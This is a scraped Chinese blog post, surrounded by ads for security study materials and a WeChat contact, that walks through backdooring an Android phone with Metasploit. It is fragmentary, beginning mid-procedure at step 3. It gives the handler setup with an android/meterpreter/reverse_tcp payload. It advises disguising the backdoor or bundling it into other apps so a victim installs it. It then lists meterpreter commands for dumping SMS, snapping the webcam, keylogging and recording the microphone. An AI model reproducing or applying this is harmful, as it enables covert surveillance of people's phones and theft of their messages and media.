Kali利用MSF渗透安卓手机_kali入侵安卓手机

于 2024-05-16 23:25:33 发布
阅读量444 收藏 12
点赞数 3
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84267585/article/details/138978698
版权

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

3.将生成的后门文件,放入靶机

4. 运行msfconsole命令

5.参数配置

use exploit/multi/handler (选择模块)
set payload android/meterpreter/reverse_tcp (选择攻击模块)
set LhOST 192.168.249.130 (本地ip)
set lport 5555  (端口)

参数配置完成,查看配置

show options


exploit  运行

6.在靶机运行后门程序

我们可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面

四、命令执行

1.查看对方手机系统信息

命令    sysinfo

2.查看对方手机安装哪些app文件

命令: app_list

3.控制摄像头拍摄一张照片

命令 webcam_snap

4.实时查看靶机的信息

命令  dump_sms

5.上传文件到靶机

upload /文件  /目标地址

6.下载文件到本机

download 文件

还可以查看帮助文档,命令help

cmd指令:

cat 读取文件内容到屏幕

cd 更改目录

checksum 检索文件的校验和

cp 将源复制到目标

del 删除指定文件

dir 列出文件(ls 的别名)

下载 下载文件或目录

编辑 编辑文件

getlwd 打印本地工作目录

getwd 打印工作目录

lcd 更改本地工作目录

lls 列出本地文件

lpwd 打印本地工作目录

ls 列出文件

mkdir 创建目录

mv 将源移动到目标

pwd 打印工作目录

rm 删除指定文件

rmdir 删除目录

search 搜索文件

show_mount 列出所有挂载点/逻辑驱动器

upload 上传文件或目录

pkill 按名称终止进程

meterpreter命令:

keyscan_start 开始捕获击键(开始键盘记录)

keyscan_dump 转储按键缓冲(下载键盘记录)

keyscan_stop 停止捕获击键(停止键盘记录)

record_mic X秒从默认的麦克风record_mic音频记录(音频录制)

webcam_chat 开始视频聊天(视频,对方会有弹窗)

webcam_list 单摄像头(查看摄像头列表)

webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)

webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)

enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)

getdesktop 得到当前的Meterpreter桌面

reboot 重新启动远程计算机

shutdown 关闭远程计算机

shell 放入系统命令 shell

enumdesktops 列出所有可访问的桌面和窗口站

getdesktop 获取当前的meterpreter桌面

idletime 返回远程用户空闲的秒数

keyboard_send 发送击键

keyevent 发送按键事件

keyscan_dump 转储击键缓冲区

keyscan_start 开始捕获击键

keyscan_stop 停止捕获击键

mouse 发送鼠标事件

screenshare 实时观看远程用户桌面

screenshot 抓取交互式桌面的屏幕截图

setdesktop 更改 Meterpreters 当前桌面

uictl 控制一些用户界面组件

record_mic 从默认麦克风录制音频 X 秒

webcam_chat 开始视频聊天

webcam_list 列出网络摄像头

webcam_snap 从指定的网络摄像头拍摄快照

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84267585
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
70-70.渗透测试-kali更新msf.mp4
05-10
70-70.渗透测试-kali更新msf.mp4
Kali利用MSF渗透安卓手机_kali入侵安卓手机,网易严选网络安全开发三面面经
m0_60607397的博客
04-05 1375
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
mac笔记本安装java环境以及idea设置
qq_41810415的博客
07-10 1万+
从windows换成笔记本的不适应,所以一些设置参数都要重新设置,本文只针对macbook笔记本且m1芯片的电脑,不过应该这个版本以上的都适用。2、创建上一步的data文件夹和/data文件夹的软连接:sudo ln -s /Users/你的用户名/data /data。这里面踩到的一些坑:git拉取的时候,明明生成ssh-key但是无法连接远程仓库,最后是版本问题,需要生成新的加密算法即可。加入这个,当然这里面说的是下载到了usr/local这个是隐藏文件夹,一般就默认下载地方就好了,不要隐藏文件夹。
Mac OS安装IDEA和JDK(超级详细教程)
weixin_45386694的博客
12-28 1万+
ME:Micro edition,是为机顶盒、移动电话和PDA之类嵌入式消费电子设备提供的Java语言平台。我下载的是apple silicon的,这个取决于电脑,如果Intel的就下载上面的镜像。EE:Enterprise edition,企业版。下载好了以后,直接点击下载好的那个包,就完成了。SE:Standard edition,标准版。至此IDEA和JDK安装成功!打开下载好的文件,点击运行。
idea工具基础配置(Mac)
flyq_coffee
12-09 7069
2、字体大小颜色 intelliJ IDEA-->preferences-->Editor-->Font 3、不区分大小写(如下图)...
2024年分布式场景下的并发安全问题,互联网行业“中年”危机
最新发布
2401_84248681的博客
05-10 567
分布式锁有很多种方案这些方案可以使用一个设计模式来统一。
mac 安装idea
sunshine983的博客
03-04 2119
mac保姆级教程安装idea
kali 渗透msf
11-14
kali渗透测试利器
kali的实战渗透
12-14
写的是kali的实战渗透,其中有讲msf渗透kali基础命令使用等等等,非常多
kali linux msf系列视频教程
10-25
kali msf 系列 第四章利用快捷方式漏洞进行渗透提权 kali msf 系列 第五章利用PDF渗透提权 kali msf 系列 第六章爆破模块讲解 kali msf 系列 第七章木马生成 kali msf 系列 第八章木马免杀 kali msf 系列 第九章...
Kali msf教程
08-24
kali linux msf系列教程
macbook安装idea
热门推荐
weixin_45317778的博客
03-16 2万+
macbook安装idea
Mac新人设置 & Idea配置
Miss的小屋
11-28 1486
大部分大厂开发人员都是使用Mac电脑(我自己也不例外),因此记录下自己对于Mac的系统设置和Idea配置的方法,以免每次使用新电脑都得重新搜教程去更改配置。
Mac下的IDEA配置
m0_46297213的博客
02-28 7013
PATH环境变量的作用就是在终端上执行命令时,系统会从PATH环境变量的路径查找命令对应的可执行程序,然后执行该程序,例如date 可以查看系统日期,而 where date 可以查看到date命令的路径,正因为/bin在PATH环境变量中,因此在终端输入date实际是运行的是/bin目录下的date程序。“java”命令的作用是运行class文件;不同类型的Shell所使用的配置文件不同,例如zsh使用的.zshrc,而bash使用的.bash_profile。
Mac安装java编程工具——idea
Y2483490891的博客
02-29 988
本文是推荐安装的是的 IDEA选择对应系统的和对应芯片mac os分为:intel(英特尔)和 Apple Silicon(苹果的M系列芯片)付费版:免费版:安装:拖进去完成安装,安装完是英文版。
MacBook IDEA 下载 安装 配置 使用
wuyujin1997的博客
04-01 1万+
文章目录下载安装配置使用 下载 搜索 idea download ,进官网。 可以看到好几种下载选项。 有账号的下 Ultimate。 没账号的下 Community。 Intel 和 Apple Sillicon 取决于你的电脑芯片。 M1芯片的下 Apple Sillicon。 可以看到 Chip Apple M1 安装 配置 使用 ...
Intellij IDEA mac 常用配置和快捷键
zhaoyang10的专栏
02-13 6463
常用快捷键: command+U 快速打开实现的接口类 command+B 定位到方法调用方 command+option+/ 代码提示 command+x 删除行 command+i 补全实现类里未实现的接口 勾选 Copy javaDoc option+shift+上下箭头 移动当前行到上一或下一行 command+d 复制当前行代码 command+option+enter 上面另起一行 c...
idea使用入门(多图)
weixin_44744941的博客
05-30 846
文章目录简介安装环境配置配置入口JDK配置maven设置字体设置快捷键设置编码设置插件设置 简介 安装 环境配置 配置入口 JDK配置 maven设置 字体设置 快捷键设置 编码设置 插件设置 springboot插件 tomcat插件 ...
使用kali 中的msf对自己的手机进行渗透的完整指令
06-11
在使用 Metasploit 渗透测试工具进行攻击前,需要明确一点:您必须拥有目标手机的授权。否则,您的行为将违反法律法规,承担法律责任。 以下是在 Kali 中使用 Metasploit 渗透测试工具对 Android 手机进行攻击的一般步骤: 1. 打开终端,输入 `msfconsole` 命令启动 Metasploit 控制台。 2. 在 Metasploit 控制台中,输入 `use exploit/multi/handler` 命令,选择要使用的 exploit 模块。 3. 设置监听器参数,包括 `LHOST`(监听主机的 IP 地址)和 `LPORT`(监听的端口号)。例如,输入 `set LHOST 192.168.0.100` 和 `set LPORT 4444` 命令设置监听器。 4. 输入 `exploit` 命令启动监听器,并等待目标手机连接。 5. 在目标手机上安装 Metasploit 的反向 shell 客户端。可以使用 Metasploit 中的 `android/meterpreter/reverse_tcp` 模块生成反向 shell 客户端,或者使用其他工具生成。将反向 shell 客户端安装在目标手机上。 6. 反向 shell 客户端连接到监听器后,您就可以在 Metasploit 控制台中执行一些命令,例如 `meterpreter > sysinfo` 命令查看目标手机的系统信息,或者 `meterpreter > shell` 命令在目标手机上打开一个 shell 终端。 请注意,这只是一般的步骤,实际操作中可能会因为目标手机的不同而有所不同。而且,再次强调,您必须拥有目标手机的授权才能进行渗透测试,否则将涉嫌违法行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值